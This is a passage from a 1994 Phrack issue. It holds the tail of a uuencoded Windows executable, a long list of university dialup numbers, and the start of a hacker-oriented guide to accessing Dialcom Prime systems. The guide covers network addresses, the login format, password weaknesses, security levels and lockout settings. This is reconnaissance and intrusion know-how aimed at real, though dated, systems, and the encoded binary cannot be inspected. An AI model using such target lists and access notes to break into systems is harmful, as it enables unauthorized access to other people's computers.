M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS<LOB3+9L%Y?J<@$6E>,Yh
|
|||
|
MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h
|
|||
|
M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*</5>Qh
|
|||
|
M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=D<S+;8'-TOVNVB^K"A1JM#WE2M3>NT)h
|
|||
|
M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h
|
|||
|
MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h
|
|||
|
M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h
|
|||
|
MFVTL1U:<CJQH&30H"-$RHE4&T7*WO='=G@4)]PW<-C6+MK<G@^\!S'F,M=ECh
|
|||
|
MFS@5E8>=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h
|
|||
|
M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h
|
|||
|
$``````#!h
|
|||
|
`h
|
|||
|
end
|
|||
|
|
|||
|
-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 13 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
The Phrack University Dialup List
|
|||
|
|
|||
|
|
|||
|
[We've been compiling all these for months now, and still have
|
|||
|
hundreds more to add. If you know dialups for any other .EDU
|
|||
|
sites or Universities elsewhere in the world that are on
|
|||
|
the Internet, please mail them to us at phrack@well.com.
|
|||
|
|
|||
|
Please, Universities ONLY...this is a list to assist students. :) ]
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
201-529-6731 RAMAPO.EDU
|
|||
|
|
|||
|
201-596-3500 NJIT.EDU
|
|||
|
|
|||
|
201-648-1010 RUTGERS.EDU
|
|||
|
|
|||
|
203-432-9642 YALE.EDU
|
|||
|
|
|||
|
205-895-6792 UAH.EDU
|
|||
|
|
|||
|
206-296-6250 SEATTLEU.EDU
|
|||
|
|
|||
|
206-552-5996 WASHINGTON.EDU
|
|||
|
685-7724
|
|||
|
7796
|
|||
|
|
|||
|
209-278-7366 CSUFRESNO.EDU
|
|||
|
|
|||
|
209-632-7522 CALSTATE.EDU
|
|||
|
|
|||
|
209-474-5784 CSUSTAN.EDU
|
|||
|
523-2173
|
|||
|
667-3130
|
|||
|
723-2810
|
|||
|
|
|||
|
210-381-3681 PANAM.EDU
|
|||
|
3590
|
|||
|
|
|||
|
210-982-0289 UTB.EDU
|
|||
|
|
|||
|
212-206-1571 NEWSCHOOL.EDU
|
|||
|
229-5326
|
|||
|
|
|||
|
212-854-1812 COLUMBIA.EDU
|
|||
|
1824
|
|||
|
1896
|
|||
|
3726
|
|||
|
9924
|
|||
|
|
|||
|
212-995-3600 NYU.EDU
|
|||
|
4343
|
|||
|
|
|||
|
213-225-6028 CALSTATELA.EDU
|
|||
|
|
|||
|
213-259-2732 OXY.EDU
|
|||
|
|
|||
|
213-740-9500 USC.EDU
|
|||
|
|
|||
|
214-368-1721 SMU.EDU
|
|||
|
3131
|
|||
|
|
|||
|
215-359-5071 DCCC.EDU
|
|||
|
|
|||
|
215-436-2199 WCUPA.EDU
|
|||
|
6935
|
|||
|
|
|||
|
215-489-0351 URSINIUS.EDU
|
|||
|
|
|||
|
215-572-5784 BEAVER.EDU
|
|||
|
|
|||
|
215-641-6436 MC3.EDU
|
|||
|
|
|||
|
215-204-1010 TEMPLE.EDU
|
|||
|
9630
|
|||
|
9638
|
|||
|
|
|||
|
215-889-1336 PSU.EDU
|
|||
|
|
|||
|
215-895-1600 DREXEL.EDU
|
|||
|
5896
|
|||
|
|
|||
|
215-896-1318 HAVERFORD.EDU
|
|||
|
1824
|
|||
|
|
|||
|
215-898-8670 UPENN.EDU
|
|||
|
6184
|
|||
|
0834
|
|||
|
3157
|
|||
|
|
|||
|
216-368-8888 CWRU.EDU
|
|||
|
|
|||
|
217-333-4000 UIUC.EDU
|
|||
|
3700
|
|||
|
244-5109
|
|||
|
4976
|
|||
|
255-9000
|
|||
|
|
|||
|
219-237-4116 INDIANA.EDU
|
|||
|
4117
|
|||
|
4186
|
|||
|
4187
|
|||
|
4190
|
|||
|
4413
|
|||
|
4415
|
|||
|
262-1082
|
|||
|
481-6905
|
|||
|
980-6553
|
|||
|
6556
|
|||
|
6866
|
|||
|
6869
|
|||
|
|
|||
|
219-989-2900 PURDUE.EDU
|
|||
|
|
|||
|
301-403-4444 UMD.EDU
|
|||
|
|
|||
|
303-270-4865 COLORADO.EDU
|
|||
|
447-1564
|
|||
|
492-0346
|
|||
|
1900
|
|||
|
1949
|
|||
|
1953
|
|||
|
1968
|
|||
|
1998
|
|||
|
938-1283
|
|||
|
|
|||
|
303-458-3588 REGIS.EDU
|
|||
|
|
|||
|
303-556-4982 MSCD.EDU
|
|||
|
623-0763
|
|||
|
0774
|
|||
|
892-1014
|
|||
|
|
|||
|
303-698-0515 DU.EDU
|
|||
|
871-3319
|
|||
|
3324
|
|||
|
4770
|
|||
|
|
|||
|
309-438-8070 ILSTU.EDU
|
|||
|
8200
|
|||
|
|
|||
|
309-677-3250 BRADLEY.EDU
|
|||
|
|
|||
|
310-769-1892 CALSTATE.EDU
|
|||
|
|
|||
|
310-985-9540 CSULB.EDU
|
|||
|
|
|||
|
312-362-1061 DEPAUL.EDU
|
|||
|
|
|||
|
312-413-3200 UIC.EDU
|
|||
|
3212
|
|||
|
|
|||
|
312-753-0975 UCHICAGO.EDU
|
|||
|
|
|||
|
313-764-4800 MERIT.EDU
|
|||
|
258-6811
|
|||
|
|
|||
|
313-487-4451 EMICH.EDU
|
|||
|
|
|||
|
314-883-7000 MISSOURI.EDU
|
|||
|
|
|||
|
315-443-1320 SYR.EDU
|
|||
|
1330
|
|||
|
3396
|
|||
|
1045
|
|||
|
|
|||
|
317-285-1000 BSU.EDU
|
|||
|
1003
|
|||
|
1005
|
|||
|
1019
|
|||
|
1048
|
|||
|
1064
|
|||
|
1068
|
|||
|
1070
|
|||
|
1076
|
|||
|
1077
|
|||
|
1087
|
|||
|
1088
|
|||
|
1089
|
|||
|
1090
|
|||
|
1099
|
|||
|
1107
|
|||
|
1108
|
|||
|
|
|||
|
317-494-6106 PURDUE.EDU
|
|||
|
496-2000
|
|||
|
|
|||
|
317-455-2426 INDIANA.EDU
|
|||
|
973-8265
|
|||
|
|
|||
|
318-261-9662 USL.EDU
|
|||
|
9674
|
|||
|
|
|||
|
319-335-6200 UIOWA.EDU
|
|||
|
|
|||
|
402-280-2119 CREIGHTON.EDU
|
|||
|
|
|||
|
404-727-8644 EMORY.EDU
|
|||
|
|
|||
|
404-894-2191 GATECH.EDU
|
|||
|
2193
|
|||
|
2195
|
|||
|
|
|||
|
407-722-2202 FIT.EDU
|
|||
|
|
|||
|
407-823-2020 UCF.EDU
|
|||
|
|
|||
|
407-835-4488 PBAC.EDU
|
|||
|
|
|||
|
408-425-8930 UCSC.EDU
|
|||
|
|
|||
|
408-554-5050 SCU.EDU
|
|||
|
9652
|
|||
|
|
|||
|
408-924-1054 CALSTATE.EDU
|
|||
|
|
|||
|
409-294-1965 SHSU.EDU
|
|||
|
|
|||
|
409-568-6028 SFASU.EDU
|
|||
|
|
|||
|
410-329-3281 UMD.EDU
|
|||
|
744-8000
|
|||
|
333-7447
|
|||
|
|
|||
|
410-516-4620 JHU.EDU
|
|||
|
5350
|
|||
|
|
|||
|
410-788-7854 UMBC.EDU
|
|||
|
|
|||
|
410-837-5750 UBALT.EDU
|
|||
|
|
|||
|
412-396-5101 DUQ.EDU
|
|||
|
|
|||
|
412-578-9896 CMU.EDU
|
|||
|
268-6901
|
|||
|
856-0815
|
|||
|
|
|||
|
412-621-5954 PITT.EDU
|
|||
|
2582
|
|||
|
3655
|
|||
|
3720
|
|||
|
8072
|
|||
|
836-7123
|
|||
|
9997
|
|||
|
|
|||
|
412-938-4063 CUP.EDU
|
|||
|
|
|||
|
413-538-2345 MTHOLYOKE.EDU
|
|||
|
|
|||
|
413-545-0755 UMASS.EDU
|
|||
|
3161
|
|||
|
3050
|
|||
|
3056
|
|||
|
5345
|
|||
|
3100
|
|||
|
3780
|
|||
|
|
|||
|
413-585-3769 SMITH.EDU
|
|||
|
|
|||
|
413-597-3107 WILLIAMS.EDU
|
|||
|
|
|||
|
415-333-1077 CALSTATE.EDU
|
|||
|
|
|||
|
415-338-1200 SFSU.EDU
|
|||
|
2400
|
|||
|
|
|||
|
415-380-0000 STANFORD.EDU
|
|||
|
|
|||
|
416-492-0239 TORONTO.EDU
|
|||
|
|
|||
|
501-575-3150 UARK.EDU
|
|||
|
3506
|
|||
|
7254
|
|||
|
7266
|
|||
|
8690
|
|||
|
|
|||
|
502-588-7027 LOUISVILLE.EDU
|
|||
|
6020
|
|||
|
8999
|
|||
|
|
|||
|
503-245-5511 PCC.EDU
|
|||
|
|
|||
|
503-346-5975 UOREGON.EDU
|
|||
|
2150
|
|||
|
3536
|
|||
|
|
|||
|
503-370-2500 WILLAMETTE.EDU
|
|||
|
|
|||
|
503-725-3100 PDX.EDU
|
|||
|
3144
|
|||
|
3201
|
|||
|
5220
|
|||
|
5401
|
|||
|
|
|||
|
503-737-1513 ORST.EDU
|
|||
|
1517
|
|||
|
1560
|
|||
|
1569
|
|||
|
|
|||
|
503-777-7757 REED.EDU
|
|||
|
|
|||
|
504-286-7300 UNO.EDU
|
|||
|
|
|||
|
504-334-1024 LSU.EDU
|
|||
|
|
|||
|
505-277-9990 UNM.EDU
|
|||
|
5950
|
|||
|
6390
|
|||
|
|
|||
|
505-646-4942 NMSU.EDU
|
|||
|
|
|||
|
508-798-0166 WPI.EDU
|
|||
|
|
|||
|
509-375-9326 WSU.EDU
|
|||
|
|
|||
|
510-643-9600 BERKELEY.EDU
|
|||
|
|
|||
|
510-727-1841 CSUHAYWARD.EDU
|
|||
|
|
|||
|
512-245-2631 SWT.EDU
|
|||
|
|
|||
|
512-471-9420 UTEXAS.EDU
|
|||
|
475-9996
|
|||
|
|
|||
|
513-327-6188 WITTENBERG.EDU
|
|||
|
|
|||
|
513-556-7000 UC.EDU
|
|||
|
|
|||
|
517-336-3200 MSU.EDU
|
|||
|
351-9640
|
|||
|
|
|||
|
518-276-2856 RPI.EDU
|
|||
|
8898
|
|||
|
8400
|
|||
|
2857
|
|||
|
2858
|
|||
|
8990
|
|||
|
|
|||
|
518-435-4110 ALBANY.EDU
|
|||
|
4160
|
|||
|
|
|||
|
519-725-5100 WATERLOO.EDU
|
|||
|
|
|||
|
601-325-4060 MSSTATE.EDU
|
|||
|
2830
|
|||
|
8348
|
|||
|
|
|||
|
602-435-3444 MARICOPA.EDU
|
|||
|
|
|||
|
602-965-7860 ASU.EDU
|
|||
|
|
|||
|
603-643-6300 DARTMOUTH.EDU
|
|||
|
|
|||
|
604-753-3245 MALPITA.EDU
|
|||
|
|
|||
|
606-622-2340 EKU.EDU
|
|||
|
|
|||
|
606-257-1232 UKY.EDU
|
|||
|
1353
|
|||
|
1361
|
|||
|
1474
|
|||
|
2836
|
|||
|
4244
|
|||
|
5627
|
|||
|
258-1996
|
|||
|
2400
|
|||
|
1200
|
|||
|
323-1996
|
|||
|
2400
|
|||
|
2700
|
|||
|
|
|||
|
609-258-2630 PRINCETON.EDU
|
|||
|
|
|||
|
609-896-3959 RIDER.EDU
|
|||
|
|
|||
|
610-683-3692 KUTZTOWN.EDU
|
|||
|
|
|||
|
612-626-1920 UMN.EDU
|
|||
|
2460
|
|||
|
9600
|
|||
|
|
|||
|
614-292-3103 OHIO-STATE.EDU
|
|||
|
3112
|
|||
|
3124
|
|||
|
3196
|
|||
|
|
|||
|
614-593-9124 OHIOU.EDU
|
|||
|
|
|||
|
615-322-3551 VANDERBILT.EDU
|
|||
|
3556
|
|||
|
343-0446
|
|||
|
1524
|
|||
|
|
|||
|
615-372-3900 TNTECH.EDU
|
|||
|
|
|||
|
615-974-3201 UTK.EDU
|
|||
|
4282
|
|||
|
6711
|
|||
|
6741
|
|||
|
6811
|
|||
|
8131
|
|||
|
|
|||
|
616-394-7120 HOPE.EDU
|
|||
|
|
|||
|
617-258-7111 MIT.EDU
|
|||
|
257-6222
|
|||
|
|
|||
|
617-287-4000 UMB.EDU
|
|||
|
265-8503
|
|||
|
|
|||
|
617-353-3500 BU.EDU
|
|||
|
4596
|
|||
|
9118
|
|||
|
9415
|
|||
|
9600
|
|||
|
|
|||
|
617-373-8660 NEU.EDU
|
|||
|
|
|||
|
617-437-8668 NORTHEASTERN.EDU
|
|||
|
|
|||
|
617-495-7111 HARVARD.EDU
|
|||
|
|
|||
|
617-727-5920 MASS.EDU
|
|||
|
|
|||
|
619-292-7514 UCSD.EDU
|
|||
|
436-7148
|
|||
|
452-4390
|
|||
|
4398
|
|||
|
8280
|
|||
|
8238
|
|||
|
9367
|
|||
|
453-9366
|
|||
|
480-0651
|
|||
|
534-5890
|
|||
|
6900
|
|||
|
6908
|
|||
|
558-7047
|
|||
|
7080
|
|||
|
9097
|
|||
|
|
|||
|
619-594-7700 SDSU.EDU
|
|||
|
|
|||
|
619-752-7964 CSUSM.EDU
|
|||
|
|
|||
|
702-895-3955 UNLV.EDU
|
|||
|
|
|||
|
703-831-5393 RUNET.EDU
|
|||
|
|
|||
|
703-993-3536 GMU.EDU
|
|||
|
|
|||
|
707-664-8093 CALSTATE.EDU
|
|||
|
822-6205
|
|||
|
|
|||
|
707-826-4621 HUMBOLDT.EDU
|
|||
|
|
|||
|
708-467-1500 NWU.EDU
|
|||
|
|
|||
|
713-749-7700 UH.EDU
|
|||
|
7741
|
|||
|
7751
|
|||
|
|
|||
|
714-364-9496 CALSTATE.EDU
|
|||
|
|
|||
|
714-773-3111 FULLERTON.EDU
|
|||
|
526-0334
|
|||
|
|
|||
|
714-856-8960 UCI.EDU
|
|||
|
|
|||
|
716-273-2400 ROCHESTER.EDU
|
|||
|
|
|||
|
716-645-6128 BUFFALO.EDU
|
|||
|
|
|||
|
719-594-9850 UCCS.EDU
|
|||
|
535-0044
|
|||
|
|
|||
|
801-581-5650 UTAH.EDU
|
|||
|
8105
|
|||
|
585-4357
|
|||
|
5550
|
|||
|
|
|||
|
803-656-1700 CLEMSON.EDU
|
|||
|
|
|||
|
804-594-7563 CNU.EDU
|
|||
|
|
|||
|
804-924-0577 VIRGINIA.EDU
|
|||
|
982-5084
|
|||
|
|
|||
|
805-549-9721 CALSTATE.EDU
|
|||
|
643-6386
|
|||
|
|
|||
|
805-664-0551 CSUBAK.EDU
|
|||
|
|
|||
|
805-756-7025 CALPOLY.EDU
|
|||
|
|
|||
|
805-893-8400 UCSB.EDU
|
|||
|
|
|||
|
806-742-1824 TTU.EDU
|
|||
|
|
|||
|
808-946-0722 HAWAII.EDU
|
|||
|
956-2294
|
|||
|
|
|||
|
810-939-3370 UMICH.EDU
|
|||
|
|
|||
|
812-855-4211 INDIANA.EDU
|
|||
|
4212
|
|||
|
9656
|
|||
|
9681
|
|||
|
944-8725
|
|||
|
9820
|
|||
|
945-6114
|
|||
|
|
|||
|
814-269-7950 PITT.EDU
|
|||
|
7970
|
|||
|
362-7597
|
|||
|
7558
|
|||
|
827-4486
|
|||
|
|
|||
|
814-863-0459 PSU.EDU
|
|||
|
4820
|
|||
|
9600
|
|||
|
865-2424
|
|||
|
|
|||
|
816-235-1491 UMKC.EDU
|
|||
|
1492
|
|||
|
1493
|
|||
|
6020
|
|||
|
|
|||
|
818-701-0478 CSUN.EDU
|
|||
|
|
|||
|
901-678-2834 MEMST.EDU
|
|||
|
|
|||
|
904-392-5533 UFL.EDU
|
|||
|
|
|||
|
904-646-2772 UNF.EDU
|
|||
|
2735
|
|||
|
|
|||
|
906-487-1530 MTU.EDU
|
|||
|
|
|||
|
907-474-0772 ALASKA.EDU
|
|||
|
789-1314
|
|||
|
|
|||
|
908-571-3555 MONMOUTH.EDU
|
|||
|
|
|||
|
908-932-4333 RUTGERS.EDU
|
|||
|
|
|||
|
909-595-3779 CSUPOMONA.EDU
|
|||
|
|
|||
|
909-595-5993 CALPOLY.EDU
|
|||
|
598-7104
|
|||
|
|
|||
|
909-621-8233 HMC.EDU
|
|||
|
|
|||
|
909-621-8455 POMONA.EDU
|
|||
|
8332
|
|||
|
|
|||
|
909-621-8361 CLAREMONT.EDU
|
|||
|
8313
|
|||
|
8108
|
|||
|
8509
|
|||
|
|
|||
|
909-880-8833 CSUSB.EDU
|
|||
|
|
|||
|
913-864-5310 UKANS.EDU
|
|||
|
897-8650
|
|||
|
|
|||
|
916-456-1441 CSUS.EDU
|
|||
|
737-0955
|
|||
|
|
|||
|
916-752-7900 UCDAVIS.EDU
|
|||
|
7920
|
|||
|
7950
|
|||
|
|
|||
|
916-894-3033 CSUCHICO.EDU
|
|||
|
|
|||
|
919-681-4900 DUKE.EDU
|
|||
|
|
|||
|
919-759-5814 WFU.EDU
|
|||
|
|
|||
|
919-962-9911 UNC.EDU
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Canada
|
|||
|
|
|||
|
204-275-6100 umanitoba.ca
|
|||
|
6132
|
|||
|
6150
|
|||
|
306-586-5550 University of Regina
|
|||
|
306-933-9400 University of Saskatchewan
|
|||
|
403-492-0024 University of Alberta
|
|||
|
0096
|
|||
|
3214
|
|||
|
416-978-3959 University of Toronto
|
|||
|
8171
|
|||
|
418-545-6010 Universite du Quebec a Chicoutimi
|
|||
|
418-656-7700 laval u
|
|||
|
3131
|
|||
|
5523
|
|||
|
506-453-4551 University of New Brunswick
|
|||
|
4560
|
|||
|
4609
|
|||
|
452-6393
|
|||
|
514-285-6401 uquebec.ca
|
|||
|
514-340-4449 polymtl.ca
|
|||
|
4450
|
|||
|
4951
|
|||
|
343-2411
|
|||
|
514-398-8111 McGill University
|
|||
|
8211
|
|||
|
8711
|
|||
|
514-733-2394 Universite de Montreal
|
|||
|
1271
|
|||
|
0832
|
|||
|
514-343-2411
|
|||
|
7835
|
|||
|
514-848-8800 concordia.ca
|
|||
|
7494
|
|||
|
8828
|
|||
|
4585
|
|||
|
8834
|
|||
|
7370
|
|||
|
519-661-3511 University of Western Ontario
|
|||
|
3512
|
|||
|
3513
|
|||
|
519-252-1101 Windsor University
|
|||
|
519-725-5100 University of Waterloo
|
|||
|
1392
|
|||
|
604-291-4700 simon fraser u
|
|||
|
4721
|
|||
|
5947
|
|||
|
604-721-2839 univ of victoria
|
|||
|
6148
|
|||
|
604-822-9600 University of British Columbia
|
|||
|
613-788-3900 Carleton University
|
|||
|
564-5600
|
|||
|
613-548-8258 Queen's University
|
|||
|
545-0383
|
|||
|
613-564-3225 University of Ottawa
|
|||
|
5926
|
|||
|
613-230-1439 York University
|
|||
|
705-741-3350 Trent University
|
|||
|
3351
|
|||
|
4637
|
|||
|
709-737-8302 Memorial Univ. of Newfoundland
|
|||
|
807-346-7770 Lakehead University
|
|||
|
819-569-9041 usherb.ca
|
|||
|
821-8025
|
|||
|
819-822-9723 bishop u
|
|||
|
819-595-2028 Universite du Quebec a Hull
|
|||
|
902-542-1585 acadiau.edu
|
|||
|
902-425-0800 tuns.ca
|
|||
|
420-7945
|
|||
|
902-429-8270 Saint Mary's University
|
|||
|
902-494-2500 Dalhousie University
|
|||
|
8000
|
|||
|
902-566-0354 University of Prince Edward Island
|
|||
|
905-570-1889 McMaster University
|
|||
|
1046
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
The Rest of the World
|
|||
|
|
|||
|
31-40-435049 tue.nl
|
|||
|
455215
|
|||
|
430032
|
|||
|
34-1-582-1941 Facultad de Odontologia
|
|||
|
3-333-9954 Barcelona Polytechnic
|
|||
|
8991 Univ of Barcelona
|
|||
|
581-2091
|
|||
|
691-5881 Polytechnic University
|
|||
|
34-7-656-6553 Univ of Zaragosa
|
|||
|
0108
|
|||
|
6654
|
|||
|
44-3-34-2755 st-andrews.ac.uk
|
|||
|
44-71-413-0790 birkbeck college
|
|||
|
44-524-843878 lancashire
|
|||
|
44-785-214479 staffs.ac.uk
|
|||
|
49-621-292-1020 uni-mannheim.de
|
|||
|
121-0251
|
|||
|
49-631-205-2150 uni-kl.de
|
|||
|
3554
|
|||
|
3629
|
|||
|
3630
|
|||
|
49-8421-5665 ku-eichstett.de
|
|||
|
49-8452-70035 tu-muenchen.de
|
|||
|
61-8-223-2657 Univ of Adelaide
|
|||
|
61-9-351-9544 Curtin U
|
|||
|
61-9-381-1630 uwa.edu.au
|
|||
|
2200
|
|||
|
3054
|
|||
|
82-2-962 kaist.ac.kr
|
|||
|
886-2-363-9529 NAT TECH U, TAIWAN
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 14 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
A L I T T L E A B O U T D I A L C O M
|
|||
|
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
Herd Beast
|
|||
|
|
|||
|
(hbeast@phantom.com)
|
|||
|
|
|||
|
Introduction
|
|||
|
~~~~~~~~~~~
|
|||
|
|
|||
|
Dialcom is an interesting system for hackers for two reasons:
|
|||
|
First, it is used by business people, reporters and many other world
|
|||
|
wide, and it offers a variety of information services, from a
|
|||
|
bulletin board to stock market updates and news services. Second,
|
|||
|
Dialcom runs on Prime machines, so using Dialcom is a good way to
|
|||
|
learn Prime. True, it's not the best, as access is generally restricted,
|
|||
|
but it's better than, say, learning VMS from Information America.
|
|||
|
|
|||
|
In these days, where everyone seems to be so centered about the
|
|||
|
Internet and the latest Unix holes, it's important to remember that the
|
|||
|
information super-highway is not quite here, and many interesting things
|
|||
|
are out there and not on the Internet. Phrack has always been a good place
|
|||
|
to find out more about these things and places, and I wrote this article
|
|||
|
after reading the Dialog articles in Phrack.
|
|||
|
|
|||
|
Well, gentle reader, I guess that my meaning-of-life crap quota is full,
|
|||
|
so let's move on.
|
|||
|
|
|||
|
Accessing Dialcom and Logging In
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Dialcom is accessible world-wide. It offers connection to Tymnet, Sprintnet,
|
|||
|
and other networks as well as dialin modems. Since I am not writing to
|
|||
|
Washington people only, I will specify only the easiest methods -- Tymnet
|
|||
|
and Sprintnet -- and some of the more interesting access methods.
|
|||
|
|
|||
|
Dialcom is basically a Primecom network. Each user has an account on
|
|||
|
one or more of the systems connected to that network. To access Dialcom,
|
|||
|
the user needs to access the machine his account is on. First, he logs
|
|||
|
into a public data network and follows the steps required to connect to
|
|||
|
a remote note. On Tymnet, this means getting to the "please log in:"
|
|||
|
prompt, and on Sprintnet it's the famous '@' prompt.
|
|||
|
|
|||
|
For Tymnet, you must enter at the prompt: DIALCOM;<system number>
|
|||
|
(eg, DIALCOM;57). The same goes for TYMUSA connection from outside
|
|||
|
the USA.
|
|||
|
|
|||
|
For Sprintnet or other PADs, you must enter the correct NUA:
|
|||
|
|
|||
|
System # Sprintnet NUA Tymnet NUA
|
|||
|
======== ============= =============
|
|||
|
XX 3110 301003XX 3106 004551XX
|
|||
|
(32, 34,
|
|||
|
41 - 46,
|
|||
|
50, 52,
|
|||
|
57, 61,
|
|||
|
63, 64)
|
|||
|
|
|||
|
It should be noted that Dialcom keeps its own X.25 network, Dialnet,
|
|||
|
and the NUAs on it are those of the systems (connect to address "57"
|
|||
|
for system 57).
|
|||
|
|
|||
|
Dialcom has other access methods, meant to be used from outside the
|
|||
|
USA, but sometimes available from within as well.
|
|||
|
|
|||
|
One is a COMCO card, which is inserted into a reader connected to the
|
|||
|
computer and the modem through a serial link. The user then calls a
|
|||
|
special dial-up number, and can connect to Dialcom (or any other NUA).
|
|||
|
The card contains a number of "tax units" which are deducted as the
|
|||
|
connection goes through, until they are exhausted and the card is useless.
|
|||
|
The user calls the dial-up and types in ".<CR>". The amount of tax units
|
|||
|
on the card will then appear on the screen, and the user can connect to a
|
|||
|
host. COMCO dial-ups:
|
|||
|
|
|||
|
Location Number
|
|||
|
======================= ==============
|
|||
|
Australia +61-02-2813511
|
|||
|
Belgium +32-02-5141710
|
|||
|
France +33-1-40264075
|
|||
|
West Germany +49-069-290255
|
|||
|
Hong Kong +852-5-8611655
|
|||
|
Netherlands +31-020-6624661
|
|||
|
Switzerland +41-022-865507
|
|||
|
United Kingdom +45-01-4077077
|
|||
|
USA (Toll Free) +1-800-777-4445
|
|||
|
USA +1-212-747-9051
|
|||
|
|
|||
|
The other way is through Infonet. I will not turn this into an Infonet
|
|||
|
guide, save to write the logon sequence needed to access Dialcom.
|
|||
|
At the '#' prompt, enter 'C'. At the "Center:" prompt, enter "DC".
|
|||
|
Dialcom NUAs are 31370093060XX, where XX is the system number.
|
|||
|
|
|||
|
Once the connection to a Dialcom system has been established, you will
|
|||
|
be greeted by the Prime header:
|
|||
|
|
|||
|
Primecom Network 19.4Q.111 System 666
|
|||
|
|
|||
|
Please Sign On
|
|||
|
>
|
|||
|
|
|||
|
And the '>' prompt. This is a limited prompt as most commands cannot
|
|||
|
be issued at it, so you need to login.
|
|||
|
|
|||
|
Dialcom user id's are typically 3 alphabetic characters followed by
|
|||
|
several digits. The password may contain any character except for
|
|||
|
",;/*" or spaces, and my experience shows that they tend to be of
|
|||
|
intermediate complexity (most will not be found in a dictionary, but
|
|||
|
could be cracked).
|
|||
|
|
|||
|
Password security may become useless at this point, because the Dialcom
|
|||
|
Prime systems allow ID to take both user id and password as arguments
|
|||
|
(which some other Primes do not) and in fact, Dialcom tutorials tell
|
|||
|
users to log on like this --
|
|||
|
|
|||
|
>ID HBT007 IMEL8
|
|||
|
|
|||
|
-- which makes ``shoulder surfing'' easier.
|
|||
|
|
|||
|
One you log on, you will see:
|
|||
|
|
|||
|
Dialcom Computer Services 19.4Q.111(666)
|
|||
|
On At 14:44 07/32/94 EDT
|
|||
|
Last On At 4:09 06/44/94 EDT
|
|||
|
|
|||
|
>
|
|||
|
|
|||
|
And again, the '>' prompt.
|
|||
|
|
|||
|
>off
|
|||
|
Off At 14:45 07/32/94 EDT
|
|||
|
Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O.
|
|||
|
|
|||
|
Security at Dialcom
|
|||
|
~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
As mentioned, while passwords are relatively secure, the manner in
|
|||
|
which they are entered is usually not.
|
|||
|
|
|||
|
As for the accounts themselves, it's important to understand the
|
|||
|
general way accounts exist on Dialcom. Dialcom users are usually
|
|||
|
part of a business that has an ``account group'' on Dialcom. Each
|
|||
|
user gets an account from that group (HBT027, HBT054). Each group
|
|||
|
also has a group administrator, who controls what each account can
|
|||
|
access. The administrator determines which programs (provided by Dialcom)
|
|||
|
each user can access. A foreign correspondent for a magazine might
|
|||
|
have access to the news services while other users might not. The
|
|||
|
administrator also determines how much the user can interface with
|
|||
|
the Prime OS itself. Each user can run a few basic commands (list
|
|||
|
files, delete, sign off) but above that, it's up to the administrator.
|
|||
|
The administrator may opt to remove a user from the controlling menuing
|
|||
|
system -- in which case, the user has no restrictions forced upon him.
|
|||
|
|
|||
|
Group administrators, however, handle only their groups, and not the
|
|||
|
Dialcom system. They need, for example, to notify Dialcom staff if
|
|||
|
they want an account removed from the system.
|
|||
|
|
|||
|
Another (different yet combined) part of the account/group security
|
|||
|
are accounts' ``security levels'' (seclevs). Seclevs range from 3
|
|||
|
to 7, and determine the access an account has to various places.
|
|||
|
Seclev 4 users, for example, are not restricted to seeing only users
|
|||
|
of their group on the system, and can delete accounts from the menuing
|
|||
|
system.
|
|||
|
|
|||
|
User accounts own their directories and files within (but high seclevs
|
|||
|
can read other users' files). Each account's security is left in some
|
|||
|
extent to its owner, in that the user sets his own password. When
|
|||
|
setting a password, a user can set a secondary password. Any user wishing
|
|||
|
to access that user's directory will need that password. Furthermore,
|
|||
|
the user can allow other users to attach as owners to his directory if
|
|||
|
they know his password (come to think of it, couldn't they just login
|
|||
|
as him?). This is all controlled by the PASSWD program (see ``Common
|
|||
|
Commands'', below).
|
|||
|
|
|||
|
Dialcom also allows for login attempt security using the NET_LOCK
|
|||
|
program. NET_LOCK blocks login attempts from addresses that have
|
|||
|
registered too many login failures over a period of time (the default
|
|||
|
being blocking for 10 minutes of addresses that have registered more
|
|||
|
than 10 failed login within 5 minutes). NET_LOCK -DISPLAY is accessible
|
|||
|
to users of Seclev 5 and shows addresses currently blocked and general
|
|||
|
information. Other options are accessible to Seclev 7 and are:
|
|||
|
-ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block
|
|||
|
an address), -LOCK_PERIOD (the period in which these attempts must
|
|||
|
occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the
|
|||
|
lockout feature is disabled).
|
|||
|
|
|||
|
A little unrelated is the network reconnect feature of the Prime
|
|||
|
computers. When a user gets disconnected from the system because
|
|||
|
of a network failure, or for any other reason which is not the
|
|||
|
system's fault, he can log back in and reconnect into the disconnected
|
|||
|
job. When this happens, the user sees, upon logging on:
|
|||
|
|
|||
|
|
|||
|
You Have a Disconnected Job:
|
|||
|
|
|||
|
HBT007 d09 1 109 NT NETLINK 989898989 6 3
|
|||
|
|
|||
|
